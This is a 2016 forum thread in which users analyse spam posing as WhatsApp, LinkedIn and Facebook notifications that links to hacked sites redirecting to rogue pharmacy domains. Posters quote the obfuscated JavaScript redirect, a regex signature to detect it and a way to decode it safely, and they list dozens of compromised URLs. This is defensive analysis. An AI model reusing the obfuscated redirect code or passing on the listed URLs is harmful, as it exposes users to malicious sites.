(The quickest way to register)

Check out our new Mobile App

Forum

  1. User picture
    • Anonymous on Fri 05 Feb 2016
    • 06:31:55 AM UTC

    Fake WhatsApp / Facebook / LinkedIn notifications

    I often receive fake notifications (WhatsApp, LinkedIn, Google or Facebook), where the link is in fact that of a compromised site, which redirects to online pharmacy.

    Fake notifications:

    Malicious code:

    Tool to safely check source code:  https://wget.alanreed.org/

    The code uses conversion of unicode values into characters. That allows to encode the redirection and the URL and so, it is less detectable by AV.

    The malicious code in the capture makes this redirection after a timeout of 1 second.

    setTimeout(window.top.location.href='hxxp://yourdrugquality.ru',1266)

    Some compromised sites:

    wisehosting.co.uk
    pro-gre.ru
    meiguojeep.com
    stonewallcommunications.com
    yellowslate.com
    clashofclanshacking.net
    mombassatarifa.com
    lgamenagements.fr
    edu-tech-int.com

Comments:

  1. User picture
    • A440 on Fri 05 Feb 2016
    • 03:16:24 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    Yes, I get the same but they obviously link to different sites that are hijacked.

  2. User picture
    • Matiks (not verified) on Fri 05 Feb 2016
    • 07:05:04 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    In fact, this "malicious code" has its proper signature that I translated with a regex. That allows me to safely check its presence in a web page (via URL).


    $regexp = "function\\s*(\\w+)\\(\\)\\s*\\{\\s*";
    $regexp .= "\\w+\\s*=\\s*(\\d+);\\s*";
    $regexp .= "\\w+\\s*=\\s*\\[(.*)\\];\\s*";
    $regexp .= "\\w+\\s*=\\s*(.*);\\s*";
    $regexp .= "for\\s*\\(\\s*\\w+\\s*=\\s*0\\s*;\\s*\\w+\\s*<\\s*\\w+\\.length;\\s*\\w+\\+\\+\\s*\\)\\s*\\{\\s*";
    $regexp .= "\\w+\\s*\\+=\\s*String\\.fromCharCode\\(\\w+\\[\\w+\\]\\s*-\\s*\\w+\\);\\s*";
    $regexp .= "\\}\\s*";
    $regexp .= "return\\s*\\w+;\\s*";
    $regexp .= "}\\s*";
    $regexp .= "setTimeout\\s*\\(\\w+\\(\\)\\s*,\\s*(\\d+)\\s*\\)";

    If a page has this malicious code, I can redraw safely the action attempted and display the results.

  3. User picture
    • Matiks (not verified) on Sat 06 Feb 2016
    • 06:32:41 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    longhairitage.com
    gowildmexico.com

    ==> medicalsafeservices.ru

  4. User picture
    • Myxt on Sun 07 Feb 2016
    • 08:05:56 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    Originally posted by: Matiks
    In fact, this "malicious code" has its proper signature that I translated with a regex. That allows me to safely check its presence in a web page (via URL). ...

    I keep a test file on my desktop - "X.htm" - which contains only
    ____

    <html><head></head><body><script>

    </script><body></html>
    ____

    and copy / paste the script content into the blank line
    ____

    <html><head></head><body><script>
    function checke() { checka=74; checkb=[193,179,184,174,185,193,120,190,185,186,120,182,185,173,171,190,179,
    185,184,120,178,188,175,176,135,113,178,190,190,186,132,121,121,190,188,191,189,190,175,174,190,171,172,
    189,183,171,188,190,120,188,191,113,133]; checkc=""; for(checkd=0;checkd<checkb.length;checkd++)
    { checkc+=String.fromCharCode(checkb[checkd]-checka); } return checkc; }
    setTimeout(checke(),1308);
    </script><body></html>
    ____

    then change the setTimeout instruction to document.write
    ____

    <html><head></head><body><script>
    function checke() { checka=74; checkb=[193,179,184,174,185,193,120,190,185,186,120,182,185,173,171,190,179,
    185,184,120,178,188,175,176,135,113,178,190,190,186,132,121,121,190,188,191,189,190,175,174,190,171,172,
    189,183,171,188,190,120,188,191,113,133]; checkc=""; for(checkd=0;checkd<checkb.length;checkd++)
    { checkc+=String.fromCharCode(checkb[checkd]-checka); } return checkc; }
    document.write(checke());
    </script><body></html>
    ____

    then save the file and double-click to open in my default browser. The document.write displays one line of text on a blank page
    ____

    window.top.location.href='http://trustedtabsmart.ru';
    ____

    This way, any math and/or substitutions - that are used to further obfuscate the code - will produce the intended executable string, except that it will be written as a line of text instead of being executed.

    For those that don't know, to set "window.top.location.href" equal to an address is to load that address into the top-most window (within a given browser tab). It's called the "top" (highest "parent") window because it may contain "child" windows such as inline frames.

  5. User picture
    • Matiks (not verified) on Sun 07 Feb 2016
    • 08:26:29 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    You may be interested to use this tool:

    https://matiks.net/MyWOT/analyzeRedirect

    • Curl call to the URL.
    • Content dealt as a DOM (via loadHTML)
    • Look at the content of script tags with the regexp (cf above)
    • Regex matches => extracts useful info to redraw safely the attempted action
  6. User picture
    • A440 on Sun 07 Feb 2016
    • 01:43:13 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    fusiontsinc.com/wp-content/executive.php

  7. User picture
    • Matiks (not verified) on Mon 08 Feb 2016
    • 07:06:31 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    thefrugalstore.com

    thefrugalstore.com/blacking.php => naturalpillmall.ru

  8. User picture
    • Myxt on Mon 08 Feb 2016
    • 09:35:13 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    Originally posted by: Matiks
    https://matiks.net/MyWOT/analyzeRedirect

    Slick! (that's a compliment)

    Hacked redirectors, not yet red

    List of domains/hosts:

    acrepairofdallas.com
    action-designs.com
    allurecenters.com
    arthurjardim.com.br
    bcda-congo.org
    coalyardcafe.com
    delrayvitamincenter.com
    dorfmaninlove.com
    emscaraibes.com
    foodforfriend.com
    gertm.nl
    j2m.name
    k12futureschool.org
    kentcustoms.com.au
    leightoncarr.com
    lonestarsurvivaltraining.com
    meovatcuocsong.org
    mustafaveis.com
    mytime99.com
    neotripbrasil.hospedagemdesites.ws
    otelug.ru
    paintbuddyinc.com
    pantaisentralpark.com
    qiptech.com
    si.secda.info
    tillalsaeed.com
    unlukablo.com
    urosankimya.com
    zhongguony.com

    Rogue pharmacies, not yet red - none

  9. User picture
    • Matiks (not verified) on Mon 08 Feb 2016
    • 10:25:28 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    Originally posted by: Myxt
    Slick! (that's a compliment)

    Thanks :)
    I have updated the layout because of long URLs which broke it (It maybe necessary to clear the cache of the browser).
    I will add a simple tool to get the list of domains which are still flagged as unrated like a kind of MRT list.

    PS: WOT ratings are updated every hours.

  10. User picture
    • Myxt on Tue 09 Feb 2016
    • 03:40:20 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirectors
    psychologiepraktijkfloor.nl
    sboconsultinggroup.com

  11. User picture
    • Myxt on Tue 09 Feb 2016
    • 06:29:52 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirector: the-ponderosa.nl

  12. User picture
    • A440 on Tue 09 Feb 2016
    • 06:31:04 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    Note: I get these things as well on just one account (gmail).

  13. User picture
    • Matiks (not verified) on Wed 10 Feb 2016
    • 06:57:30 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    viralentodas.com
    cnsbilisim.net

  14. User picture
    • A440 on Wed 10 Feb 2016
    • 11:48:51 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hwotp://www.quangcaobinhduong.vn/wp-content/plugins/rewarded.php

  15. User picture
    • A440 on Thu 11 Feb 2016
    • 11:52:02 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hwotp://luger-academia.com.br/chewer.php

    Sent from oneandone.net as well:
    217.160.23.133

  16. User picture
    • Myxt on Fri 12 Feb 2016
    • 06:18:50 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirector: nochinches.com/microprocessing.php

  17. User picture
    • Matiks (not verified) on Sat 13 Feb 2016
    • 05:29:37 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    csrforgood.com/wp-content/connective.php

  18. User picture
    • Myxt on Sat 13 Feb 2016
    • 08:34:03 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirectors:
    tipstomarketing.com/wp-content/uncaught.php
    theproxypromise.com/tints.php

  19. User picture
    • Matiks (not verified) on Sat 13 Feb 2016
    • 01:56:06 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    qlkh.tueba.edu.vn/heretics.php

  20. User picture
    • A440 on Sat 13 Feb 2016
    • 05:44:39 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    You already got this one, which just came in here:
    hwotp://neotripbrasil.hospedagemdesites.ws/apricot.php

    Courtesy of 1and1.com

  21. User picture
    • Myxt on Sun 14 Feb 2016
    • 01:17:26 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirector: crm.iphysicianhub.in/Zend/Validate/patchwork.php

  22. User picture
    • A440 on Mon 15 Feb 2016
    • 02:43:05 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    Another one that "Myxt" listed earlier just came in:
    hwotp://coalyardcafe.com/wp-content/uploads/emigrating.php
    All of these that hit my gmail account are from a 1and1.com IP address.

  23. User picture
    • Myxt on Mon 15 Feb 2016
    • 04:11:06 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirectors:
    jefcoinc.net/wp-content/plugins/designation.php
    coastsoccer.com/masrer/snowed.php
    lovephuket.com/wp-content/themes/underling.php

  24. User picture
    • Matiks (not verified) on Mon 15 Feb 2016
    • 06:24:44 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    gravodisc.com.br/bkp/components/com_jce/editor/tiny_mce/plugins/erasers.php

  25. User picture
    • Myxt on Mon 15 Feb 2016
    • 10:14:03 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirector: cabanapoolandspa.com/wp-content/salz.php

  26. User picture
    • Myxt on Tue 16 Feb 2016
    • 07:10:27 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirectors:
    gneve.com/disfiguring.php
    ahalac.fr/wp-content/animism.php

  27. User picture
    • Myxt on Tue 16 Feb 2016
    • 09:46:51 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirector: soonersigns.com/wp-content/dirts.php

  28. User picture
    • Matiks (not verified) on Wed 17 Feb 2016
    • 08:28:34 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    resuflocrm.com/lemmas.php
    schoolwave.ru/plugins/slogin_auth/yahoo/assets/proselytize.php

  29. User picture
    • A440 on Wed 17 Feb 2016
    • 06:12:39 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    centralmarketingsystems.com/continuously.php

  30. User picture
    • Matiks (not verified) on Wed 17 Feb 2016
    • 08:15:46 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    mm1989.it/administrator/components/com_media/researched.php